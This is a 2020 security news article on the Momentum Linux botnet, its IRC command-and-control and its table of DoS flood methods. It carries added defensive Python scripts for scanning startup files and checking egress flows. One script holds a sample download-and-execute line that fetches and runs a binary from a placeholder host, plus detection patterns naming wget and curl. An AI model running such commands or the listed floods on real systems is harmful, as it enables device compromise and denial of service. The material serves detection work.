Monday, October 26, 2020

Momentum Botnet Attacks Linux Devices and Recruit them as Botnet

Security researchers from Trend Micro observed new malware activity targeting devices running the Linux platform; the malware samples were found to be connected with the Momentum botnet.

The campaign aims to install a backdoor on the Linux device that accepts commands from the attackers' server and uses them to conduct various types of DoS attacks against a given target.

Momentum Botnet Attack Campaign

The Momentum botnet targets Linux devices running on various CPU architectures such as ARM, MIPS, Intel, Motorola 68020, and more. Mirai, Kaiten, and Bashlite are the backdoor variants distributed by the Momentum botnet.

The botnet exploits various vulnerabilities in the targeted router devices and web services to deploy and execute PowerShell scripts.

Figure: Momentum botnet servers

Once the botnet infects a device, it modifies the run-commands configuration file ("rc") and joins the device to the command-and-control (C&C) server through an Internet Relay Chat (IRC) channel.

The infected device then connects to the distribution server, from which the operators issue various commands to launch 36 different attack methods using the compromised devices.
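The two behaviours just described, an edited rc startup file and registration with a C&C server over IRC, are things a responder can check for on a suspect device or in a packet capture. The Python script below is an added example and is not code from this article or from Trend Micro. The startup-file contents, the remote address (a documentation range, not a real indicator), the file name and the IRC payload lines are all constructed samples; the heuristics are generic download-and-execute patterns, not the specific strings used by Momentum.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of an rc.local-style startup file. The fourth line is the
# kind of entry a bot installer appends; 203.0.113.10 is a documentation address
# and "bot.arm" a placeholder name, not real indicators from the article.
SAMPLE_RC = """#!/bin/sh
# legitimate startup commands
/usr/sbin/ntpd -p pool.ntp.org
cd /tmp; wget http://203.0.113.10/bot.arm -O .b; chmod +x .b; ./.b &
exit 0
"""

# Constructed payload lines as they might appear in a capture of an infected
# device's outbound TCP session (plaintext IRC protocol verbs plus one HTTP line).
SAMPLE_PAYLOAD = [
    "NICK mips-00a1",
    "USER x 8 * :x",
    "JOIN #ctrl",
    ":srv PING :1234",
    "PRIVMSG #ctrl :hello",
    "GET / HTTP/1.1",
]

# Generic heuristics for startup lines added by Linux IoT bot installers
# (assumed patterns, not a signature for this particular botnet).
SUSPICIOUS_PATTERNS = [
    (r"\b(wget|curl|tftp|ftpget)\b", "downloads from a remote host at boot"),
    (r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b", "marks a file executable at boot"),
    (r"(^|;|&&)\s*\./\S+\s*&?\s*$", "executes a relative path (backgrounded)"),
    (r"\b/tmp/|cd\s+/tmp\b|/dev/shm/", "works out of a world-writable directory"),
]

IRC_VERBS = {"NICK", "USER", "JOIN", "PRIVMSG", "PING", "PONG", "MODE", "TOPIC"}


@dataclass
class Finding:
    line_no: int
    line: str
    reasons: list = field(default_factory=list)


def scan_rc_file(text):
    """Return a Finding for every non-comment line that trips a heuristic."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, stripped)]
        if reasons:
            findings.append(Finding(no, stripped, reasons))
    return findings


def irc_verbs_in(payload_lines):
    """Return the IRC verbs found in captured lines (server-prefixed or not).

    A router or camera that is not an IRC client emitting these verbs to an
    arbitrary port is a C&C indicator worth investigating."""
    seen = []
    for line in payload_lines:
        parts = line.split(" ")
        # Messages from the server carry a ":prefix" before the verb.
        verb = parts[1] if line.startswith(":") and len(parts) > 1 else parts[0]
        if verb.upper() in IRC_VERBS:
            seen.append(verb.upper())
    return seen


if __name__ == "__main__":
    for f in scan_rc_file(SAMPLE_RC):
        print(f"rc line {f.line_no}: {f.line}")
        for r in f.reasons:
            print(f"    - {r}")
    print("IRC verbs seen:", irc_verbs_in(SAMPLE_PAYLOAD))
```

On a real device the same scan would be run over /etc/rc.local, /etc/rc.d/* and /etc/inittab, and the IRC check over the payload of any long-lived outbound TCP session from a device that has no business speaking IRC; a match in either is a reason to pull the binary for analysis, not a verdict on its own.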

Command      Description
ACK          ACK flooder
ADV-TCP      TCP flooding – improved SSYN attack
BLACKNURSE   An ICMP packet flooder
DNS          DNS amplification flooder
ECE          Attacking (not in use); type of SYN flood
ESSYN        ExecuteSpoofedSyn flooder
FIN          Attacking (not in use); FIN flood
FRAGACK      ACK fragmentation flood
FRAG-TCP     Spoofed TCP fragmentation flooder
GRE          GRE flood
HOLD         (Not in use) TCP connect flooder (frag)
HTTP         HTTP flooder
HTTPFLOOD    HTTP flooding
JUNK         TCP flooder (frag)
LDAP         LDAP amplification flooder
MEMCACHE     Memcache amplification flooder
NSACK        Type of ACK flood
NSSYN        Type of SYN flooder
OVH          Type of UDP flooding (DOMINATE)
PHATWONK     Multiple attacks in one, e.g. xmas, all flags set at once, usyn (urg syn), and any TCP flag combination
RTCP         A random TCP flooder with fragmented packet header
SACK         Type of TCP flood
SEW          Attacking; type of SYN flood
SSYN2        Type of SYN flood
STUDP        STD flooder
STUDP        STD flooder
SYN          SYN flooder
SYNACK       SYN-ACK flood
TCPNULL      TCP-Nulled flooding – flood with TCP packets with no flag set
UDP          UDP flood
UDP-BYPASS   A UDP flooder (vulnMix)
UNKNOWN      UDP flooder
URG          Attacking
VOLT-UDP     Spoofed UDP flooder, can bypass most firewalls
VSE          Valve Source Engine amplification
XMAS         TCP Xmas flood

Researchers observed that in the MEMCACHE, LDAP, DNS, and Valve Source Engine attacks the malware typically sends requests with a spoofed source IP address to publicly accessible servers, which then direct their (larger) responses at the spoofed address.

The botnet is also capable of “opening a proxy on a port on a specified IP, changing the nick of the client, disabling or enabling packeting from the client, and more.”

In the LDAP DDoS reflection and Memcache attacks the botnet spoofs the source IP address, while the UDP-BYPASS attack targets the host by constructing and unloading a legitimate UDP payload on a specific port.

The Momentum botnet also includes capabilities such as fast flux, backdoor, and propagation, which it uses to spread to and compromise further devices.
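Every reflection attack in the table above depends on the infected device being able to send UDP packets with a forged source address to public DNS, LDAP, Memcached or Valve Source Engine servers. The standard network-side mitigation is egress filtering (BCP38): packets leaving a network whose source address is not inside that network's own prefix are dropped at the edge. The script below is an added example, not code from the article or from Trend Micro; it runs that check over constructed NetFlow-style records (documentation address ranges, not real indicators) and additionally flags high-volume traffic to the reflector ports the article names. The packet threshold is an assumed value for illustration.

```python
import ipaddress
from collections import Counter

# UDP ports of the reflection/amplification services named in the article:
# DNS (53), LDAP (389), Memcached (11211), Valve Source Engine (27015).
REFLECTOR_PORTS = {53: "DNS", 389: "LDAP", 11211: "Memcached", 27015: "Valve Source Engine"}

# Constructed outbound UDP flow records as (src_ip, dst_ip, dst_port, packets),
# as seen at the edge of a network whose only legitimate prefix is 192.0.2.0/24.
# All addresses are from documentation ranges.
SAMPLE_FLOWS = [
    ("192.0.2.15", "198.51.100.53", 53, 12),        # ordinary DNS lookups
    ("203.0.113.7", "198.51.100.20", 11211, 5000),  # source is not ours: spoofed victim
    ("203.0.113.7", "198.51.100.21", 389, 4200),    # same spoofed source, LDAP reflector
    ("192.0.2.44", "198.51.100.9", 27015, 3100),    # our address, but abusive volume
    ("192.0.2.15", "198.51.100.80", 443, 40),       # unrelated traffic
]


def egress_findings(flows, local_prefix, packet_threshold=1000):
    """Apply a BCP38 source check and a reflector-port volume check to each flow.

    Returns a list of (src, dst, dport, reasons) for flows that trip either check.
    The threshold is an assumed value; tune it to the link's normal traffic."""
    net = ipaddress.ip_network(local_prefix)
    findings = []
    for src, dst, dport, pkts in flows:
        reasons = []
        if ipaddress.ip_address(src) not in net:
            reasons.append("source address outside local prefix (spoofed; BCP38 drop)")
        if dport in REFLECTOR_PORTS and pkts >= packet_threshold:
            reasons.append(f"high-volume traffic to {REFLECTOR_PORTS[dport]} reflector port {dport}")
        if reasons:
            findings.append((src, dst, dport, reasons))
    return findings


def spoofed_victims(flows, local_prefix):
    """Count packets per out-of-prefix source address.

    With reflection, the forged source is the real victim: every reflector
    answers to it, so this count tells a responder who is being attacked."""
    net = ipaddress.ip_network(local_prefix)
    victims = Counter()
    for src, _, _, pkts in flows:
        if ipaddress.ip_address(src) not in net:
            victims[src] += pkts
    return victims


if __name__ == "__main__":
    for src, dst, dport, reasons in egress_findings(SAMPLE_FLOWS, "192.0.2.0/24"):
        print(f"{src} -> {dst}:{dport}")
        for r in reasons:
            print(f"    - {r}")
    print("victims of spoofed traffic:", dict(spoofed_victims(SAMPLE_FLOWS, "192.0.2.0/24")))
```

The first check is the one that actually breaks reflection: an infected device behind an edge that drops out-of-prefix sources can still flood, but only with its own address, so reflectors answer the bot rather than the victim. The second check catches the case the first cannot, an internal address driving unusual volume at amplification services, which is how an infected device on a BCP38-filtered network still shows up.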
